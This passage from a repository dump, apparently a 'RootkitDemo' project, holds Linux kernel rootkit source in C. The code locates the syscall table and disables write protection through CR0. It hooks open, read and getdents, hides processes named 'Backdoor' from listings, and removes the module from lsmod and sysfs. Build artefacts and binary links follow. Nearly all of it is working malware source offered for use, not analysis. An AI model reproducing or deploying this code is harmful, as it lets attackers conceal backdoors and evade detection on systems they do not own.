| 192 | 193 | char * findoffset(char *start) 194 | { 195 | 196 | char *p; 197 | 198 | for (p = start; p < start + CALLOFF; p++) 199 | 200 | if (*(p + 0) == '\xff' && *(p + 1) == '\x14' && *(p + 2) == '\x85') 201 | 202 | return p; 203 | 204 | return NULL; 205 | } 206 | 207 | void **get_sct_addr(void) 208 | { 209 | unsigned sys_call_off; 210 | 211 | unsigned sct = 0; 212 | 213 | char *p; 214 | 215 | asm("sidt %0":"=m"(idtr)); 216 | 217 | idt = (void *) (idtr.base + 8 * 0x80); 218 | 219 | sys_call_off = (idt->off2 << 16) | idt->off1; 220 | 221 | if ((p = findoffset((char *) sys_call_off))) 222 | 223 | sct = *(unsigned *) (p + 3); 224 | 225 | return ((void **)sct); 226 | } 227 | 228 | /* 229 | 230 | 模块的初始化函数 当载入模块时调用 231 | 232 | 先将原系统调用表的函数取出,并打印,再修改cr0,使其第17位置0,使得系统调用表区域可写,再将我们构造的系统调用函数写入,最后将cr0恢复,再打印 233 | 234 | */ 235 | 236 | static int begin(void) 237 | 238 | { 239 | 240 | unsigned int cr0; 241 | 242 | sys_call_table=get_sct_addr(); 243 | 244 | origin_open=sys_call_table[__NR_open]; 245 | origin_read=sys_call_table[__NR_read]; 246 | 247 | printk("<0> sys_call_table[__NR_read] = 0x%x\n", (unsigned int)sys_call_table[__NR_read]); 248 | printk("<0> sys_call_table[__NR_open] = 0x%x\n", (unsigned int)sys_call_table[__NR_open]); 249 | 250 | 251 | cr0=clear_cr0(); 252 | 253 | sys_call_table[__NR_open]=hooked_open; 254 | sys_call_table[__NR_read]=hooked_read; 255 | 256 | setback_cr0(cr0); 257 | 258 | printk("<1> sys_call_table[__NR_read] = 0x%x\n", (unsigned int)sys_call_table[__NR_read]); 259 | printk("<1> sys_call_table[__NR_open] = 0x%x\n", (unsigned int)sys_call_table[__NR_open]); 260 | 261 | return 0; 262 | 263 | } 264 | 265 | /* 266 | 267 | 模块的卸载函数 当模块卸载时调用 268 | 269 | 先将系统调用表区域权限设置为可写,然后修改系统调用表的表项,最后恢复系统调用表权限为只读。 270 | 271 | */ 272 | 273 | static void end(void) 274 | 275 | { 276 | 277 | unsigned int cr0; 278 | 279 | cr0=clear_cr0(); 280 | 281 | if(sys_call_table) 282 | 283 | { 284 | 285 | sys_call_table[__NR_open]=origin_open; 286 | sys_call_table[__NR_read]=origin_read; 287 | 288 | } 289 | 290 | setback_cr0(cr0); 291 | 292 | } 293 | 294 | 295 | 296 | 297 | 298 | module_init(begin); 299 | 300 | module_exit(end); 301 | 302 | 303 | 304 | 305 | 306 | 307 | -------------------------------------------------------------------------------- /src/netstat/hidens.ko: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/warcraft23/RootkitDemo/fda5751c72a5792ecc39967864a98622cace23e8/src/netstat/hidens.ko -------------------------------------------------------------------------------- /src/netstat/hidens.mod.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | MODULE_INFO(vermagic, VERMAGIC_STRING); 6 | 7 | struct module __this_module 8 | __attribute__((section(".gnu.linkonce.this_module"))) = { 9 | .name = KBUILD_MODNAME, 10 | .init = init_module, 11 | #ifdef CONFIG_MODULE_UNLOAD 12 | .exit = cleanup_module, 13 | #endif 14 | .arch = MODULE_ARCH_INIT, 15 | }; 16 | 17 | static const struct modversion_info ____versions[] 18 | __used 19 | __attribute__((section("__versions"))) = { 20 | { 0x15b2dc7b, "module_layout" }, 21 | { 0x50eedeb8, "printk" }, 22 | { 0x8235805b, "memmove" }, 23 | { 0xe2d5255a, "strcmp" }, 24 | { 0xb4390f9a, "mcount" }, 25 | }; 26 | 27 | static const char __module_depends[] 28 | __used 29 | __attribute__((section(".modinfo"))) = 30 | "depends="; 31 | 32 | 33 | MODULE_INFO(srcversion, "9D27CE515AEEBAD865B27D7"); 34 | -------------------------------------------------------------------------------- /src/netstat/hidens.mod.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/warcraft23/RootkitDemo/fda5751c72a5792ecc39967864a98622cace23e8/src/netstat/hidens.mod.o -------------------------------------------------------------------------------- /src/netstat/hidens.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/warcraft23/RootkitDemo/fda5751c72a5792ecc39967864a98622cace23e8/src/netstat/hidens.o -------------------------------------------------------------------------------- /src/netstat/modules.order: -------------------------------------------------------------------------------- 1 | kernel//home/rootkit/RootkitWS/Rootkit/netstat/hidens.ko 2 | -------------------------------------------------------------------------------- /src/ps/Makefile: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/warcraft23/RootkitDemo/fda5751c72a5792ecc39967864a98622cace23e8/src/ps/Makefile -------------------------------------------------------------------------------- /src/ps/Module.symvers: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/warcraft23/RootkitDemo/fda5751c72a5792ecc39967864a98622cace23e8/src/ps/Module.symvers -------------------------------------------------------------------------------- /src/ps/hideps.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include 10 | #include 11 | #include 12 | #include 13 | //#include 14 | //#include 15 | #define CALLOFF 100 16 | 17 | 18 | int orig_cr0; 19 | //char psname[10]="test1"; 20 | char psname[10]="Backdoor"; 21 | char *processname=psname; 22 | 23 | //module_param(processname, charp, 0); 24 | struct { 25 | unsigned short limit; 26 | unsigned int base; 27 | } __attribute__ ((packed)) idtr; 28 | 29 | struct { 30 | unsigned short off1; 31 | unsigned short sel; 32 | unsigned char none,flags; 33 | unsigned short off2; 34 | } __attribute__ ((packed)) * idt; 35 | 36 | struct linux_dirent{ 37 | unsigned long d_ino; 38 | unsigned long d_off; 39 | unsigned short d_reclen; 40 | char d_name[1]; 41 | }; 42 | 43 | void** sys_call_table; 44 | 45 | unsigned int clear_and_return_cr0(void) 46 | { 47 | unsigned int cr0 = 0; 48 | unsigned int ret; 49 | 50 | asm volatile ("movl %%cr0, %%eax" 51 | : "=a"(cr0) 52 | ); 53 | ret = cr0; 54 | 55 | /*clear the 20th bit of CR0,*/ 56 | cr0 &= 0xfffeffff; 57 | asm volatile ("movl %%eax, %%cr0" 58 | : 59 | : "a"(cr0) 60 | ); 61 | return ret; 62 | } 63 | 64 | void setback_cr0(unsigned int val) 65 | { 66 | asm volatile ("movl %%eax, %%cr0" 67 | : 68 | : "a"(val) 69 | ); 70 | } 71 | 72 | 73 | asmlinkage long (*orig_getdents)(unsigned int fd, 74 | struct linux_dirent __user *dirp, unsigned int count); 75 | 76 | char * findoffset(char *start) 77 | { 78 | char *p; 79 | for (p = start; p < start + CALLOFF; p++) 80 | if (*(p + 0) == '\xff' && *(p + 1) == '\x14' && *(p + 2) == '\x85') 81 | return p; 82 | return NULL; 83 | } 84 | 85 | int myatoi(char *str) 86 | { 87 | int res = 0; 88 | int mul = 1; 89 | char *ptr; 90 | for (ptr = str + strlen(str) - 1; ptr >= str; ptr--) 91 | { 92 | if (*ptr < '0' || *ptr > '9') 93 | return (-1); 94 | res += (*ptr - '0') * mul; 95 | mul *= 10; 96 | } 97 | if(res>0 && res< 9999) 98 | printk(KERN_INFO "pid=%d,",res); 99 | printk("\n"); 100 | return (res); 101 | } 102 | 103 | struct task_struct *get_task(pid_t pid) 104 | { 105 | struct task_struct *p = get_current(),*entry=NULL; 106 | list_for_each_entry(entry,&(p->tasks),tasks) 107 | { 108 | if(entry->pid == pid) 109 | { 110 | printk("pid found=%d\n",entry->pid); 111 | return entry; 112 | } 113 | else 114 | { 115 | // printk(KERN_INFO "pid=%d not found\n",pid); 116 | } 117 | } 118 | return NULL; 119 | } 120 | 121 | static inline char *get_name(struct task_struct *p, char *buf) 122 | { 123 | int i; 124 | char *name; 125 | name = p->comm; 126 | i = sizeof(p->comm); 127 | do { 128 | unsigned char c = *name; 129 | name++; 130 | i--; 131 | *buf = c; 132 | if (!c) 133 | break; 134 | if (c == '\\') { 135 | buf[1] = c; 136 | buf += 2; 137 | continue; 138 | } 139 | if (c == '\n') 140 | { 141 | buf[0] = '\\'; 142 | buf[1] = 'n'; 143 | buf += 2; 144 | continue; 145 | } 146 | buf++; 147 | } 148 | while (i); 149 | *buf = '\n'; 150 | return buf + 1; 151 | } 152 | 153 | int get_process(pid_t pid) 154 | { 155 | struct task_struct *task = get_task(pid); 156 | // char *buffer[64] = {0}; 157 | char buffer[64]; 158 | if (task) 159 | { 160 | get_name(task, buffer); 161 | // if(pid>0 && pid<9999) 162 | // printk(KERN_INFO "task name=%s\n",*buffer); 163 | if(strstr(buffer,processname)) 164 | return 1; 165 | else 166 | return 0; 167 | } 168 | else 169 | return 0; 170 | } 171 | 172 | asmlinkage long hacked_getdents(unsigned int fd, 173 | struct linux_dirent __user *dirp, unsigned int count) 174 | { 175 | //added by lsc for process 176 | long value; 177 | // struct inode *dinode; 178 | unsigned short len = 0; 179 | unsigned short tlen = 0; 180 | // struct linux_dirent *mydir = NULL; 181 | //end 182 | value = (*orig_getdents) (fd, dirp, count); 183 | tlen = value; 184 | while(tlen > 0) 185 | { 186 | len = dirp->d_reclen; 187 | tlen = tlen - len; 188 | printk("%s\n",dirp->d_name); 189 | 190 | if(get_process(myatoi(dirp->d_name)) ) 191 | { 192 | printk("find process\n"); 193 | memmove(dirp, (char *) dirp + dirp->d_reclen, tlen); 194 | value = value - len; 195 | printk(KERN_INFO "hide successful.\n"); 196 | } 197 | else{ 198 | if(tlen) 199 | dirp = (struct linux_dirent *) ((char *)dirp + dirp->d_reclen); 200 | } 201 | } 202 | printk(KERN_INFO "finished hacked_getdents.\n"); 203 | return value; 204 | } 205 | 206 | 207 | void **get_sct_addr(void) 208 | { 209 | unsigned sys_call_off; 210 | unsigned sct = 0; 211 | char *p; 212 | asm("sidt %0":"=m"(idtr)); 213 | idt = (void *) (idtr.base + 8 * 0x80); 214 | sys_call_off = (idt->off2 << 16) | idt->off1; 215 | if ((p = findoffset((char *) sys_call_off))) 216 | sct = *(unsigned *) (p + 3); 217 | return ((void **)sct); 218 | } 219 | 220 | static inline void rootkit_hide(void) 221 | { 222 | list_del(&THIS_MODULE->list);//lsmod,/proc/modules 223 | kobject_del(&THIS_MODULE->mkobj.kobj);// /sys/modules 224 | list_del(&THIS_MODULE->mkobj.kobj.entry);// kobj struct list_head entry 225 | } 226 | 227 | static int filter_init(void) 228 | { 229 | sys_call_table = get_sct_addr(); 230 | if (!sys_call_table) 231 | { 232 | printk("get_act_addr(): NULL...\n"); 233 | return 0; 234 | } 235 | else 236 | printk("sct: 0x%x\n", (unsigned int)sys_call_table); 237 | orig_getdents = sys_call_table[__NR_getdents]; 238 | printk("offset: 0x%x\n\n\n\n",orig_getdents); 239 | orig_cr0 = clear_and_return_cr0(); 240 | sys_call_table[__NR_getdents] = hacked_getdents; 241 | setback_cr0(orig_cr0); 242 | rootkit_hide(); 243 | printk(KERN_INFO "hideps: module loaded.\n"); 244 | return 0; 245 | } 246 | 247 | 248 | static void filter_exit(void) 249 | { 250 | orig_cr0 = clear_and_return_cr0(); 251 | if (sys_call_table) 252 | sys_call_table[__NR_getdents] = orig_getdents; 253 | setback_cr0(orig_cr0); 254 | printk(KERN_INFO "hideps: module removed\n"); 255 | } 256 | module_init(filter_init); 257 | module_exit(filter_exit); 258 | MODULE_LICENSE("GPL"); 259 | -------------------------------------------------------------------------------- /src/ps/hideps.ko: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/warcraft23/RootkitDemo/fda5751c72a5792ecc39967864a98622cace23e8/src/ps/hideps.ko -------------------------------------------------------------------------------- /src/ps/hideps.mod.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | MODULE_INFO(vermagic, VERMAGIC_STRING); 6 | 7 | struct module __this_module 8 | __attribute__((section(".gnu.linkonce.this_module"))) = { 9 | .name = KBUILD_MODNAME, 10 | .init = init_module, 11 | #ifdef CONFIG_MODULE_UNLOAD 12 | .exit = cleanup_module, 13 | #endif 14 | .arch = MODULE_ARCH_INIT, 15 | }; 16 | 17 | static const struct modversion_info ____versions[] 18 | __used 19 | __attribute__((section("__versions"))) = { 20 | { 0x15b2dc7b, "module_layout" }, 21 | { 0xf557ca5c, "kobject_del" }, 22 | { 0x8235805b, "memmove" }, 23 | { 0xf0fdf6cb, "__stack_chk_fail" }, 24 | { 0x1e6d26a8, "strstr" }, 25 | { 0x289ae517, "current_task" }, 26 | { 0x50eedeb8, "printk" }, 27 | { 0xd0d8621b, "strlen" }, 28 | { 0xb4390f9a, "mcount" }, 29 | }; 30 | 31 | static const char __module_depends[] 32 | __used 33 | __attribute__((section(".modinfo"))) = 34 | "depends="; 35 | 36 | 37 | MODULE_INFO(srcversion, "D9A8C6EED7C2F729902F3FA"); 38 | -------------------------------------------------------------------------------- /src/ps/hideps.mod.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/warcraft23/RootkitDemo/fda5751c72a5792ecc39967864a98622cace23e8/src/ps/hideps.mod.o -------------------------------------------------------------------------------- /src/ps/hideps.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/warcraft23/RootkitDemo/fda5751c72a5792ecc39967864a98622cace23e8/src/ps/hideps.o -------------------------------------------------------------------------------- /src/ps/modules.order: -------------------------------------------------------------------------------- 1 | kernel//home/rootkit/RootkitWS/Rootkit/ps/hideps.ko 2 | --------------------------------------------------------------------------------